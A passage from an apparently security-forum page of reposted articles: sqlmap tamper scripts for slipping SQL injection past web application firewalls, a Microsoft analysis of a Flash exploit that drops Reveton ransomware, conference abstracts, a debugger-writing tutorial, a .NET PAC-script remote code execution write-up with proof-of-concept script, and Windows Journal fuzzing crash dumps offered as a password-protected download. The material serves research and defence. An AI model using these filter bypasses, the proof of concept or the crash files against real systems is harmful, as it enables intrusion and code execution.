* MySQL 5.1.56, 5.5.11 * PostgreSQL 9.0 Notes: * Useful to bypass weak and bespoke web application firewalls randomcase Replaces each keyword character with random case value Tested against: * Microsoft SQL Server 2005 * MySQL 4, 5.0 and 5.5 * Oracle 10g * PostgreSQL 8.3, 8.4, 9.0 Notes: * Useful to bypass very weak and bespoke web application firewalls that has poorly written permissive regular expressions * This tamper script should work against all (?) databases securesphere Appends special crafted string Notes: * Useful for bypassing Imperva SecureSphere WAF * Reference: Full Disclosure: Imperva SecureSphere - SQL injection filter bypass space2comment Replaces space character (‘ ‘) with comments ‘/**/’ Tested against: * Microsoft SQL Server 2005 * MySQL 4, 5.0 and 5.5 * Oracle 10g * PostgreSQL 8.3, 8.4, 9.0 Notes: * Useful to bypass weak and bespoke web application firewalls space2plus Replaces space character (‘ ‘) with plus (‘+’) Notes: * Is this any useful? The plus get’s url-encoded by sqlmap engine invalidating the query afterwards * This tamper script works against all databases space2randomblank Replaces space character (‘ ‘) with a random blank character from a valid set of alternate characters Tested against: * Microsoft SQL Server 2005 * MySQL 4, 5.0 and 5.5 * Oracle 10g * PostgreSQL 8.3, 8.4, 9.0 Notes: * Useful to bypass several web application firewalls xforwardedfor Append a fake HTTP header ‘X-Forwarded-For’ to bypass WAF (usually application based) protection SAP MaxDB ifnull2ifisnull,nonrecursivereplacement,randomcase,securesphere,space2comment,space2plus,unionalltounion,unmagicquotes,xforwardedfor ifnull2ifisnull Replaces instances like ‘IFNULL(A, ’ with ‘IF(ISNULL(A), B, A)’ Requirement: * MySQL * SQLite (possibly) * SAP MaxDB (possibly) Tested against: * MySQL 5.0 and 5.5 Notes: * Useful to bypass very weak and bespoke web application firewalls that filter the IFNULL() function nonrecursivereplacement Replaces predefined SQL keywords with representations suitable for replacement (e.g. .replace(“SELECT”, “”)) filters Notes: * Useful to bypass very weak custom filters randomcase Replaces each keyword character with random case value Tested against: * Microsoft SQL Server 2005 * MySQL 4, 5.0 and 5.5 * Oracle 10g * PostgreSQL 8.3, 8.4, 9.0 Notes: * Useful to bypass very weak and bespoke web application firewalls that has poorly written permissive regular expressions * This tamper script should work against all (?) databases securesphere Appends special crafted string Notes: * Useful for bypassing Imperva SecureSphere WAF * Reference: Full Disclosure: Imperva SecureSphere - SQL injection filter bypass space2comment Replaces space character (‘ ‘) with comments ‘/**/’ Tested against: * Microsoft SQL Server 2005 * MySQL 4, 5.0 and 5.5 * Oracle 10g * PostgreSQL 8.3, 8.4, 9.0 Notes: * Useful to bypass weak and bespoke web application firewalls space2plus Replaces space character (‘ ‘) with plus (‘+’) Notes: * Is this any useful? The plus get’s url-encoded by sqlmap engine invalidating the query afterwards * This tamper script works against all databases unionalltounion Replaces UNION ALL SELECT with UNION SELECT unmagicquotes Replaces quote character (‘) with a multi-byte combo %bf%27 together with generic comment at the end (to make it work) Notes: * Useful for bypassing magic_quotes/addslashes feature Reference: * http://shiflett.org/blog/2006/jan/addslashes-versus-mysql-real-escape-string xforwardedfor Append a fake HTTP header ‘X-Forwarded-For’ to bypass WAF (usually application based) protection SQLite ifnull2ifisnull,multiplespaces,nonrecursivereplacement,randomcase,securesphere,space2comment,space2dash,space2plus,unionalltounion,unmagicquotes,xforwardedfor ifnull2ifisnull Replaces instances like ‘IFNULL(A, ’ with ‘IF(ISNULL(A), B, A)’ Requirement: * MySQL * SQLite (possibly) * SAP MaxDB (possibly) Tested against: * MySQL 5.0 and 5.5 Notes: * Useful to bypass very weak and bespoke web application firewalls that filter the IFNULL() function multiplespaces Adds multiple spaces around SQL keywords Notes: * Useful to bypass very weak and bespoke web application firewalls that has poorly written permissive regular expressions Reference: https://www.owasp.org/images/7/74/Advanced_SQL_Injection.ppt nonrecursivereplacement Replaces predefined SQL keywords with representations suitable for replacement (e.g. .replace(“SELECT”, “”)) filters Notes: * Useful to bypass very weak custom filters randomcase Replaces each keyword character with random case value Tested against: * Microsoft SQL Server 2005 * MySQL 4, 5.0 and 5.5 * Oracle 10g * PostgreSQL 8.3, 8.4, 9.0 Notes: * Useful to bypass very weak and bespoke web application firewalls that has poorly written permissive regular expressions * This tamper script should work against all (?) databases securesphere Appends special crafted string Notes: * Useful for bypassing Imperva SecureSphere WAF * Reference: Full Disclosure: Imperva SecureSphere - SQL injection filter bypass space2comment Replaces space character (‘ ‘) with comments ‘/**/’ Tested against: * Microsoft SQL Server 2005 * MySQL 4, 5.0 and 5.5 * Oracle 10g * PostgreSQL 8.3, 8.4, 9.0 Notes: * Useful to bypass weak and bespoke web application firewalls space2dash Replaces space character (‘ ‘) with a dash comment (‘–‘) followed by a random string and a new line (‘\n’) Requirement: * MSSQL * SQLite Notes: * Useful to bypass several web application firewalls * Used during the ZeroNights SQL injection challenge, https://proton.onsec.ru/contest/ space2plus Replaces space character (‘ ‘) with plus (‘+’) Notes: * Is this any useful? The plus get’s url-encoded by sqlmap engine invalidating the query afterwards * This tamper script works against all databases unionalltounion Replaces UNION ALL SELECT with UNION SELECT unmagicquotes Replaces quote character (‘) with a multi-byte combo %bf%27 together with generic comment at the end (to make it work) Notes: * Useful for bypassing magic_quotes/addslashes feature Reference: * http://shiflett.org/blog/2006/jan/addslashes-versus-mysql-real-escape-string xforwardedfor Append a fake HTTP header ‘X-Forwarded-For’ to bypass WAF (usually application based) protection Sursa: SQLMap Tamper Scripts | NI @RooT

An interesting case of the CVE-2014-8439 exploit msft-mmpc 2 Dec 2014 6:02 PM We have recently seen an exploit targeting the Adobe Flash Player vulnerability CVE-2014-8439 (we detect it as Exploit:SWF/Axpergle). This exploit is being integrated into multiple exploit kits, including the Nuclear exploit kit (Exploit:JS/Neclu) and the Angler exploit kit (Exploit:JS/Axpergle). Adobe released a patch in November to address this exploit (APSB14-26). Coincidentally, our investigation shows that Adobe released a patch to address a different exploit and that patch appears to have rendered this exploit useless. CVE-2014-0569 or CVE-2014-8439? In our analysis of the exploit code, we noticed that the exploit author seems to be confused about the CVE number of the vulnerability they are trying to exploit. It appears the author thinks the exploit is CVE-2014-0569, when the vulnerability they are actually targeting is CVE-2014-8439. This incorrect CVE number is used in the source path (Figure 1) of the SWF file. Figure 1: Incorrect CVE number (CVE-2014-0569) used The unusual control transfer trick To successfully deliver the attack, the exploit needs to transfer control to the deliberately crafted code. In this exploit we didn't see the common tricks used by SWF exploits to cause the control transfer (see Cracking the CVE-2014-0569 nutshell and A journey to CVE-2014-0497 exploit). Actually, we didn't even see any code which explicitly causes the control transfer. After some further investigation, we discovered the new trick used by this exploit: it attempts to use the vulnerability to corrupt a garbage collection (GC) object. In the GC object, there is an ITelemetry object pointer (offset 0x180 on the Flash Player we are analyzing). The ITelemetry object's VTABLE is crafted with the address to which the control is transferred (Figure 2). Figure 2: Crafted GC object, Crafted ITelemetry object and Crafted VTABLE entries The control will be transferred to return-oriented programming (ROP) gadgets via the ITelemetry.IsActive() virtual function call when garbage collection occurs (Figure 3). Figure 3: Control transferred to ROP gadgets Shellcode and payload The shellcode downloads and decrypts a DLL from a remote server. It then registers the DLL by executing the regsvr32 command. The DLL is detected as Ransom:Win32/Reveton, which is a lockscreen ransomware trojan. You should apply the update from Adobe, mentioned in APSB14-26, keep your software up-to-date, and use a real-time security product such as Microsoft Security Essentials to help protect your PC from this and other threats. Chun Feng MMPC Acknowledgements I would like to thank Timo Hirvonen from F-Secure and Kafeine from Malware don't need Coffee for the great help during my analysis. SHA1s used in this analysis: 647F07A99C9C1D38AAAEA9AF4ECC4F16989D0CA6 (detected as Exploit:SWF/Axpergle) D479D5F9C449CF04EE8F692D95ED939871269DD5 (detected as Ransom:Win32/Reveton.AA) Sursa: An interesting case of the CVE-2014-8439 exploit - Microsoft Malware Protection Center - Site Home - TechNet Blogs

[h=1]Danijel Grah, Milan Gabor - Vaccinating Android[/h] Înc?rcat pe 30 oct. 2014 https://www.hacktivity.com The number of mobile applications is rising and Android still holds a large market share. As the number of applications grows, we need better tools to understand how applications work and to analyze them. There is always the question if we can trust mobile applications to do only what they are allowed to do and if they are really secure when transmitting our personal information to different servers. In the presentation some runtime techniques will be discussed and a tool will be released that offers two approaches to analyze Android applications. The basic principle of the first approach is injecting a small piece of code into APK and then connecting to it and using Java Reflection to runtime modify value, call methods, instantiate classes and create own scripts to automate work. The second approach offers much the same functionality, but can be used without modifying an application. It uses Dynamic Dalvik Instrumentation to inject code at runtime so that modifying APK's isn't necessary. The tool is Java based and simple to use, but offers quite a few new possibilities for security engineers and pentesters.

[h=1]Aleksandr Timorin - SCADA Deep Inside: Protocols and Security Mechanisms[/h] Înc?rcat pe 29 oct. 2014 https://www.hacktivity.com In my topic I'll share my experience in the analysis of the most popular open and vendor specific proprietary industrial protocols. For each protocol I will present the packet structure, real examples, (in)secure features and possible hacks. At the end of the topic I'll share my practical approach, methodology and useful scripts. Also, 0 day vulnerabilities and exploits will be presented. Topic level and requirements: midlevel, requires base skills in networks, ISO/OSI model, hex numbers.

[h=1]Csaba Otti, Daniel Martinkovics, Sándor Kapitány, András Fehér - Iris Identification[/h] Înc?rcat pe 30 oct. 2014 https://www.hacktivity.com One of the most futuristic solutions of biometric identification (or regarded as such) is iris identification. Plenty of ideas and misbeliefs are associated with this technology. In our presentation we wish to present the truth, the real working of the technology, its solutions and, last but not least, some of its vulnerabilities. A live demo will show how an iris identification device works and how it can be attacked by using simple tools. In addition, we will talk about the main uses of iris identification. It is made especially relevant by the recent news that certain phone manufacturers plan to include iris identification in their mobile phones besides fingerprint recognition.

[h=1]Tibor B?sze - Cryptocurrencies: The Other Side of the Coin[/h] Înc?rcat pe 28 oct. 2014 https://www.hacktivity.com This presentation covers threats to the ecosystem along with practices a security conscious user should follow. It is explained how bitcoin, the dominant cryptocurrency, interfaces with the real world and why some exchanges, mining pools and wallet & payment related habits render risks, and how technology and common sense can be applied to mitigate these risks. A case study on remotely reverse engineering, the reward calculation method of a popular mining pool is shown, pinpointing differences between their published and applied formula, and turning the findings to our advantage. The focus is on technology & security; financial, economical or legal aspects are not discussed.

[h=1]Gábor Szappanos - Practical Shellcode Analysis[/h] Înc?rcat pe 28 oct. 2014 https://www.hacktivity.com The presentation will cover the tools and techniques a threat researcher can use to analyse shellcodes. The available free and commercial tools will be introduced. I will show how emulators and disassemblers can be used in the static analysis of shellcodes as well as the dynamic debugging possibilities. All of the methods will be demonstrated on real-life examples of shellcodes that were either used in targeted attacks or exploit-kit based web attacks..

Writing a Primitive Debugger: Part 2 (Breakpoints/Stepping) Posted on December 2, 2014 by admin For a debugger to be of any practical use, it needs the ability to pause, inspect, and resume a target process. This post will cover these topics by discussing what breakpoints are, how they are implemented by most debuggers on the x86 and x64 Windows platforms, and how to perform instruction level stepping. Breakpoints A breakpoint can simply be defined as a place in a executing code that causes an intentional halt of execution. In the context of debuggers, this is useful because it allows the debugger to inspect the process at that moment in time when nothing is going on — when the process is effectively “broken”. Typical functionality that is seen in debuggers when the target is in a broken state is the ability to view and modify registers/memory, print a disassembly listing of the area surrounding the breakpoint, step into or step over assembly instructions or lines of source code, and other related diagnostic features. Breakpoints themselves can come in a few different varieties. Hardware Interrupt Breakpoints Hardware interrupt breakpoints are probably the most common and simple breakpoints to understand and to implement in a debugger. These are specific to the x86 and x64 architectures and are implemented by using a hardware-supported instruction specifically made to generate a software interrupt that is meant for debuggers. The opcode for this instruction is 0xCC and it matches to an INT 3 instruction. The way that most debuggers implement this is to replace the opcode at the desired address — that is, the breakpoint address — with the 0xCC opcode. When the code is called, the interrupt (EXCEPTION_BREAKPOINT) will be raised, which the debugger will handle and give the user the option to perform the debugging functionality mentioned above. When the user is finished inspecting the program state at that address and wishes to continue, the debugger will replace the original instruction back, make sure that the executing address (EIP or RIP registers, depending on the architecture) point to that original address, and continue execution. However, an interesting problem comes up. When the original instruction is replaced back, the breakpoint will be lost. This may be alright if the breakpoint is meant to be hit only once, but that is very rarely the case. There needs to be a way to re-enable that breakpoint immediately afterwards. This is done by setting the EFlags (or RFlags for x64) register to set the processor into single-step mode. Fortunately, that is pretty easily accomplished by enabling the 8th bit, i.e. performing an OR with 0x100. When the EXCEPTION_BREAKPOINT exception is handled and execution resumes, there will be another exception, EXCEPTION_SINGLE_STEP, thrown on the next instruction executed. At this point, the debugger can re-enable the breakpoint on the previous instruction and resume execution. On the Windows platform, it is easy to see all of this at work by inspecting the DebugBreak function. This function is meant to trigger a local (from within the same process) breakpoint. Below is the disassembly of the function, which shows it simply being what is described above. Those wondering about the mov edi, edi instruction can read more about hot-patchable images, specifically Raymond Chen’s post about the explanation. _DebugBreak@0: 752C3C5D 8B FF mov edi,edi 752C3C5F CC int 3 752C3C60 C3 ret Hardware Debug Registers The second breakpoint implementation technique is also specific to the x86 and x64 architectures and takes advantage of specific debug registers provided by the instruction set. These are the debug registers DR0, DR1, DR2, DR3, and DR7. The first four registers are used to hold the addresses that a hardware breakpoint will break on. Using these means that for the entire program, there can be at most four hardware breakpoints active. The DR7 register is used to control enablement of these registers, with bits 0, 2, 4, 6 corresponding to on/off for DR0, … , DR3. Additionally, bits 16-17, 20-21, 24-25, and 28-29 function as a bitmask for DR0, … , DR3 for when these breakpoints will trigger, with 00 being on execution, 01 on read, and 11 on write. Setting these breakpoints on the Windows platform is a bit tricky. They must be set on the processes main thread. This involves getting the main thread, opening a handle to it with at least THREAD_GET_CONTEXT and THREAD_SET_CONTEXT privileges, and getting/setting the threads context with GetThreadContext/SetThreadContext with the newly added debug registers to reflect the changes. Take note that no executable code in memory is modified to set these breakpoints. It is not like the previous case where an opcode had to be replaced. These are breakpoints that set and unset by changing the contents of hardware registers. What will happen when these are set is that the process will raise an EXCEPTION_SINGLE_STEP exception upon hitting the instruction at the address, which the debugger will then process in a fashion nearly identical to the way it would in the previous section. Due to the small number limitation, these won’t be presented in the sample breakpoint code in this post, but may eventually be written about in the future for the sake of completeness. I have written about their usage for API hooking in a previous post (excuse the dead links in the beginning). The implementation for a debugger is very close to how it is presented there. Software Breakpoints This last class of breakpoints is performed entirely in software and is tied strongly to how the operating system functions. Another name for them is memory breakpoints. They combine some of the best features of interrupt breakpoints, namely the ability to have as many as you’d like, with the best features of hardware breakpoints, which is that nothing in the executing code needs to be overwritten. However, there is a major drawback: they add a significant slowdown to the execution of the code due to their implementation. Instead of being implemented at the address level, these are implemented at the page level. How these work is that the address where a breakpoint will be set will have its page permissions changed to that of a guard page using VirtualProtectEx. When any instruction on the page will be accessed, there will be an EXCEPTION_GUARD_PAGE exception thrown. The debugger will handle this exception and check if the offending address is that of the breakpoint address. If so, the debugger can perform the usual handling/user prompt as with any other breakpoint. If not then the debugger must perform some extra steps. According to the documentation, the guard page protection will be removed from the page after it is raised. This means that once the exception is handled and execution continues, any access afterwards will not generate an EXCEPTION_GUARD_PAGE exception. So in the case that the instruction accessed is not the desired breakpoint address, the breakpoint will be lost. To remedy this, the technique similar to the one presented in the hardware interrupt breakpoint section will be used. The processor will enter in to single-step mode and continue execution. On the next instruction, there will be an EXCEPTION_SINGLE_STEP exception raised. This will be handled by the debugger and the guard page property will be re-enabled on the page. This implementation also will not be covered in this post, but may be covered in the future. I have written about it before, also in the context of API hooking, here. Implementations As mentioned above, enabling and disabling hardware interrupt breakpoints is simply a matter of overwriting opcodes with 0xCC (INT 3). In Windows, this is accomplished in a pretty straightforward manner with the usage of ReadProcessMemory and WriteProcessMemory. [TABLE] [TR] [TD=class: code]const bool InterruptBreakpoint::EnableBreakpoint() { SIZE_T ulBytes = 0; bool bSuccess = BOOLIFY(ReadProcessMemory(m_hProcess, (LPCVOID)m_dwAddress, &m_originalByte, sizeof(unsigned char), &ulBytes)); if (bSuccess && ulBytes == sizeof(unsigned char)) { bSuccess = BOOLIFY(WriteProcessMemory(m_hProcess, (LPVOID)m_dwAddress, &m_breakpointOpcode, sizeof(unsigned char), &ulBytes)); return bSuccess && (ulBytes == sizeof(unsigned char)); } else { fprintf(stderr, "Could not read from address %p. Error = %X\n", m_dwAddress, GetLastError()); } return false; }[/TD] [/TR] [/TABLE] The original byte at the target address is read and stored and then overwritten with 0xCC. Nothing too shocking or out of the ordinary. Disabling the breakpoint is simply done by performing the opposite and writing back the original byte. [TABLE] [TR] [TD=class: code]const bool InterruptBreakpoint::DisableBreakpoint() { SIZE_T ulBytes = 0; const bool bSuccess = BOOLIFY(WriteProcessMemory(m_hProcess, (LPVOID)m_dwAddress, &m_originalByte, sizeof(unsigned char), &ulBytes)); if (bSuccess && ulBytes == sizeof(unsigned char)) { return true; } fprintf(stderr, "Could not write back original opcode to address %p. Error = %X\n", m_dwAddress, GetLastError()); return false; }[/TD] [/TR] [/TABLE] Now with the ability to enable/disable breakpoints, it is time to look at the handlers. As mentioned, upon accessing the instruction where the breakpoint resides, an EXCEPTION_BREAKPOINT exception will be raised. There are a few steps here that need to be done: Check if the breakpoint is in the breakpoint list. This is done because when the debugger first attaches, an EXCEPTION_BREAKPOINT will be raised from the debuggers attaching thread (see previous post). We don’t care about this exception, so just skip it and continue execution If it is in the breakpoint list, and therefore a breakpoint that the user explicitly set, it needs to be disabled. As mentionted before, this is to allow the original instruction to be executed. Open a handle to the thread and get the thread context. Change the execution pointer (EIP or RIP) to point to the breakpoint address and also enable single-step mode. Set the thread context to this newly modified context Save this breakpoint. This is to re-enable it during the EXCEPTION_SINGLE_STEP exception that will be raised immediately after continuing execution. Prompt the user to continue or perform single-steps. Wait for their response and continue execution afterwards depending on the choice. Put into code, it looks like the following: [TABLE] [TR] [TD=class: code]Register(DebugExceptions::eBreakpoint, [&](const DEBUG_EVENT &dbgEvent) { auto &exceptionRecord = dbgEvent.u.Exception.ExceptionRecord; const DWORD_PTR dwExceptionAddress = (DWORD_PTR)exceptionRecord.ExceptionAddress; fprintf(stderr, "Received breakpoint at address %p.\n", dwExceptionAddress); Breakpoint *pBreakpoint = m_pDebugger->FindBreakpoint(dwExceptionAddress); if (pBreakpoint != nullptr) { if (pBreakpoint->Disable()) { CONTEXT ctx = { 0 }; ctx.ContextFlags = CONTEXT_ALL; HANDLE hThread = OpenThread(THREAD_GET_CONTEXT | THREAD_SET_CONTEXT, FALSE, dbgEvent.dwThreadId); if (hThread != NULL) { (void)GetThreadContext(hThread, &ctx); #ifdef _M_IX86 ctx.Eip = (DWORD_PTR)dwExceptionAddress; #elif defined _M_AMD64 ctx.Rip = (DWORD_PTR)dwExceptionAddress; #else #error "Unsupported architecture" #endif ctx.EFlags |= 0x100; m_pDebugger->m_pLastBreakpoint = pBreakpoint; m_pDebugger->m_dwExecutingThreadId = dbgEvent.dwThreadId; (void)SetThreadContext(hThread, &ctx); fprintf(stderr, "Press c to continue or s to begin stepping.\n"); (void)m_pDebugger->WaitForContinue(); } else { fprintf(stderr, "Could not open handle to thread %p. Error = %X\n", dbgEvent.dwThreadId, GetLastError()); } } else { fprintf(stderr, "Could not remove breakpoint at address %p.", dwExceptionAddress); } } SetContinueStatus(DBG_CONTINUE); });[/TD] [/TR] [/TABLE] The handler for EXCEPTION_SINGLE_STEP exceptions serves two purposes: it is there to re-enable breakpoints that were just hit, and it is also there to allow the user to continue single-stepping execution of the program. As a result of this, there needs to be a flag declared that is set when the user wishes to enter single-step mode by themselves (instead of it being set through hitting a breakpoint). If the user is in single-step mode then show them a prompt and wait for a response to continue stepping or to continue execution entirely. Again, put into code, it looks like the following: [TABLE] [TR] [TD=class: code]Register(DebugExceptions::eSingleStep, [&](const DEBUG_EVENT &dbgEvent) { auto &exceptionRecord = dbgEvent.u.Exception.ExceptionRecord; const DWORD_PTR dwExceptionAddress = (DWORD_PTR)exceptionRecord.ExceptionAddress; fprintf(stderr, "Received single step at address %p\n", dwExceptionAddress); if (m_pDebugger->m_bIsStepping) { fprintf(stderr, "Press s to continue stepping.\n"); m_pDebugger->m_dwExecutingThreadId = dbgEvent.dwThreadId; (void)m_pDebugger->WaitForContinue(); } if (!m_pDebugger->m_pLastBreakpoint->IsEnabled()) { (void)m_pDebugger->m_pLastBreakpoint->Enable(); } SetContinueStatus(DBG_CONTINUE); });[/TD] [/TR] [/TABLE] Debugger in action With everything in place, the debugger is ready to be tested out. The easiest way is to write a sample program that will be attached to: [TABLE] [TR] [TD=class: code]#include #include void TestFunction() { printf("Hello, World!\n"); } int main(int argc, char *argv[]) { printf("Test function address: %p\n", TestFunction); while (true) { getchar(); TestFunction(); } return 0; }[/TD] [/TR] [/TABLE] On my machine, TestFunction resided at 0x13B1000. After attaching and setting a breakpoint on this address, the debugger was able to successfully step execution of the program or continue entirely. a Target address: 0x13B1000 Received breakpoint at address 13B1000. Press c to continue or s to begin stepping. s Received single step at address 13B1001 Press s to continue stepping. s Received single step at address 13B1003 Press s to continue stepping. s Received single step at address 13B1009 Press s to continue stepping. s Received single step at address 13B100A Press s to continue stepping. c The stepped addresses successfully matched up with the disassembly. 013B1000 55 push ebp 013B1001 8B EC mov ebp,esp 013B1003 81 EC C0 00 00 00 sub esp,0C0h 013B1009 53 push ebx 013B100A 56 push esi This was also tested on an x64 version (with a x64 build of the debugger) with equal success. Article Roadmap Future posts will be related on topics closely following the items below: Basics Adding/Removing Breakpoints, Single-stepping Call Stack, Registers, Contexts Symbols Miscellaneous Features The full source code relating to this can be found here. C++11 features were used, so MSVC 2012/2013 is most likely required. Sursa: Writing a Primitive Debugger: Part 2 (Breakpoints/Stepping) | RCE Endeavors

Old .NET Vulnerability #1: PAC Script RCE (CVE-2012-4776) This is the start of a very short series on some of my old .NET vulnerabilities which have been patched. Most of these issues have never been publicly documented, or at least there have been no PoCs made available. Hopefully it's interesting to some people. The first vulnerability I'm going to talk about is CVE-2012-4776 which was fixed in MS12-074. It was an issue in the handling of Web Proxy Auto-Configuration scripts (PAC). It was one of the only times that MS has ever credited me with a RCE in .NET since they made it harder to execute .NET code from IE. Though to be fair making it harder might be partially my fault. The purpose of a PAC script, if you've never encountered one before, is to allow a web client to run some proxy decision logic before it connects to a web server. An administrator can configure the script to make complex decisions on how outbound connections are made, for example forcing all external web sites through a gateway proxy but all Intranet connections go direct to the server. You can read all about it on Wikipedia and many other sites as well but the crucial thing to bear in mind is the PAC script is written in Javascript. The most basic PAC script you can create is as follows: function FindProxyForURL(url, host) { // Always return no proxy setting return "DIRECT"; } On Windows if you use the built-in HTTP libraries such as WinINET and WinHTTP you don't need to worry about these files yourself, but if you roll your own HTTP stack, like .NET does, you'd be on your own to reimplement this functionality. So when faced with this problem what to do? If you answered, "let's use a .NET implementation of Javascript" you'd be correct. Some people don't realise that .NET comes with its own implementation of Javascript (JScript for licensing reasons). It even comes with a compiler, jsc.exe, installed by default. While I was having a look at .NET, evaluating anything interesting which asserts full trust permissions I came across the .NET PAC implementation. The following method is from the System.Net.VsaWebProxyScript class in the Microsoft.JScript assembly (some code removed for brevity): [PermissionSet(SecurityAction.Assert, Name="FullTrust")] public bool Load(Uri engineScriptLocation, string scriptBody, Type helperType) { try { engine = new VsaEngine(); engine.RootMoniker = "pac-" + engineScriptLocation.ToString(); engine.Site = new VsaEngineSite(helperType); engine.InitNew(); engine.RootNamespace = "__WebProxyScript"; StringBuilder sb = new StringBuilder(); sb.Append("[assembly:System.Security.SecurityTransparent()] ..."); sb.Append("class __WebProxyScript { ... }\r\n"); sb.Append(scriptBody); IVsaCodeItem item2 = engine.Items.CreateItem("SourceText", VsaItemType.Code, VsaItemFlag.None) as IVsaCodeItem; item2.SourceText = sb.ToString(); if (engine.Compile()) { engine.Run(); scriptInstance = Activator.CreateInstance( engine.Assembly.GetType("__WebProxyScript.__WebProxyScript")); CallMethod(scriptInstance, "SetEngine", new object[] { engine }); return true; } } catch { } return false; } The code is taking the PAC script from the remote location as a string, putting it together with some boiler plate code to implement the standard PAC functions and compiling it to an assembly. This seems too good to be true from an exploit perspective. It was time to give it a try so I configured a simple .NET application with a PAC script by adding the following configuration to the application: <configuration> <system.net> <defaultProxy> <proxy autoDetect="true" scriptLocation="http://127.0.0.1/test.js" /> </defaultProxy> </system.net> </configuration Of course in a real-world scenario the application probably isn't going to be configured like this. Instead the proxy settings might be configured through WPAD, which is known to be spoofable or the system settings. When the application makes a connection using the System.Net.WebClient class it will load the PAC file from the scriptLocation and execute it. With a test harness ready let's try a few things: import System; function FindProxyForURL(url, host) { Console.WriteLine("Hello World!"); return "DIRECT"; } This printed out "Hello World!" as you'd expect, so we can compile and executing JScript.NET code. Awesome. So let's go for the win! import System.IO; function FindProxyForURL(url, host) { File.WriteAllText("test.txt", "Hello World!"); return "DIRECT"; } And... it fails, silently I might add I guess we need to get to the bottom of this. When dealing with the internals of the framework I usually find it easiest to get WinDBG involved. All .NET frameworks come with a handy debugger extension, SOS, which we can use to do low-level debugging of .NET code. A quick tutorial, open the .NET executable in WinDBG and run the following two lines at the console. sxe clr sxe -c ".loadby sos mscorwks; gh" ld:mscorwks What these lines do is set WinDBG to stop on a CLR exception (.NET uses Windows SEH under the hood to pass on exceptions) and adds a handler to load the SOS library when the DLL mscorwks gets loaded. This DLL is the main part of the CLR, we can't actually do any .NET debugging until the CLR is started. As a side note, if this was .NET 4 and above replace mscorwks with clr as that framework uses clr.dll as its main implementation. Restarting the execution of the application we wait for the debugger to break on the CLR exception. Once we've broken into the debugger you can use the SOS command !pe to dump the current exception: Well no surprises, we got a SecurityException trying to open the file we specified. Now at this point it's clear that the PAC script must be running in Partial Trust (PT). This isn't necessarily an issue as I still had a few PT escapes to hand, but would be nice not to need one. By dumping the call stack using the !clrstack command we can see that the original caller was System.Net.AutoWebProxyScriptWrapper. Looking at the class it confirms our suspicions of being run in PT. In the class' CreateAppDomain method it creates an Internet security AppDomain which is going to be pretty limited in permissions then initializes the System.Net.VsaWebProxyScript object inside it. As that class derives from MarshalByRefObject it doesn't leave the restricted AppDomain. Still in situations like this you shouldn't be disheartened, let's go back and look at how the assembly was being loaded into memory. We find it's being loaded from a byte array (maybe bad) but passing a null for the evidence parameter (awesome). As we can see in the remarks from Assembly.Load this is a problem: When you use a Load method overload with a Byte[] parameter to load a COFF image, evidence is inherited from the calling assembly. This applies to the .NET Framework version 1.1 Service Pack 1 (SP1) and subsequent releases. So what we end up with is an assembly which inherits its permissions from the calling assembly. The calling assembly is trusted framework code, which means our compiled PAC code is also trusted code. So why doesn't the file function work? Well you have to remember how security in AppDomains interact with the security stack walk when a demand for a permission is requested. The transition between the trusted and the untrusted AppDomains acts as a PermitOnly security boundary. What this means is that even if every caller on the current stack is trusted, if no-one asserts higher permissions than the AppDomain's current set then a demand would fail as shown in the below diagram: There are plenty of ways around this situation, in fact we'll see a few in my next post on this topic. But for now there's an easy way past this issue, all we need is something to assert suitable permissions for us while we run our code. Turns out it was there all along, the original Load method uses the attribute form of permission assertion to assert full trust. [PermissionSet(SecurityAction.Assert, Name="FullTrust")] We can get code to run in that method because the loading of the assembly will execute any global JScript code automatically, so a quick modification and we get privileged execution: import System.IO; File.WriteAllText("test.txt", "Hello World!"); function FindProxyForURL(url, host) { return "DIRECT"; } Why couldn't we have just done a new PermissionSet(PermissionState.Unrestricted).Assert() here? Well if you look at the code being generated for compilation it sets the SecurityTransparent assembly attribute. This tells the CLR that this code isn't allowed to elevate its permissions, but it's transparent to security decisions. If you have a trusted assembly which is transparent it doesn't effect the stack walk at all, but it also cannot assert higher permissions. This is why the assertion in the Load method was so important. Of course this assertion was what originally led me to finding the code in the first place. Microsoft fixed this in two ways, first they "fixed" the JScript code to not execute under a privileged permission set as well as passing an appropriate evidence object to the Assembly load. And secondly they basically blocked use of JScript.NET by default (see the notes in the KB article here). If you ever find a custom implementation of PAC scripts in an application it's always worth a quick look to see what they're using. Posted by tiraniddo at 05:40 Sursa: Tyranid's Lair: Old .NET Vulnerability #1: PAC Script RCE (CVE-2012-4776)

[h=1]Windows Journal has a lot of 0days![/h] @w3bd3vil I was reading the blog at beyondtrust and decided to check if Journal was really an easy target. Behold, multiple exploitable looking crashes in a couple of minutes of mutation! The original.jnt is the same file used in the blog. All files can be downloaded from: https://mega.co.nz/#!nUUS3DhK!cQuL3x1Z-MmxOUsUwfDlVjfiJDyjlkhAacynW4FnAKc Password: webdevil Tested on Win7 otelgyuztokyfflidmre.jnt (388.133c): Access violation - code c0000005 (!!! second chance !!!) ntdll!RtlpFreeHeap+0x5d5: 00000000`772b46e5 418b40f8 mov eax,dword ptr [r8-8] ds:ffffffff`fffffff8=???????? 0:000> k Child-SP RetAddr Call Site 00000000`0029e320 00000000`772b40fd ntdll!RtlpFreeHeap+0x5d5 00000000`0029e660 000007fe`feeb10c8 ntdll!RtlFreeHeap+0x1a6 00000000`0029e6e0 000007fe`ebb02070 msvcrt!free+0x1c 00000000`0029e710 000007fe`ebb00985 NBDoc!CEPMRCFormatReader::BlcReWrite+0xba0 00000000`0029e8c0 000007fe`ebaefcfc NBDoc!CEPMRCFormatReader::RgnsToImageLayers+0x2c5 00000000`0029ea10 000007fe`ebaee744 NBDoc!CIFD::GetMRCImages+0x54c 00000000`0029eb10 000007fe`ebaedfa2 NBDoc!CIFD::GetCompositeLayer+0x4c4 00000000`0029ec00 000007fe`eba80f2c NBDoc!CIFD::GetImageLayerEx+0x172 00000000`0029ec70 000007fe`eba80cd0 NBDoc!CEPEditablePageTiffImpl::InternalGetImageLayer+0x218 00000000`0029ed30 000007fe`efdba523 NBDoc!CEPEditablePageTiffImpl::GetImageLayer+0x80 00000000`0029ed80 000007fe`efdc636a MSPVWCTL!CPage::EnableImageLayer+0xbb 00000000`0029edd0 000007fe`efdb4210 MSPVWCTL!CPageDisplay::SetPageNum+0xb6 00000000`0029ee30 000007fe`efdb56e6 MSPVWCTL!CMultiPageDisplayViewBase::AddPageD+0x1dc 00000000`0029eee0 000007fe`efdb4b40 MSPVWCTL!CDocViewBaseImpl::UpdateViewLayout+0x3ca 00000000`0029f040 000007fe`efd96245 MSPVWCTL!CDocViewBaseImpl::Recalc+0x3c 00000000`0029f090 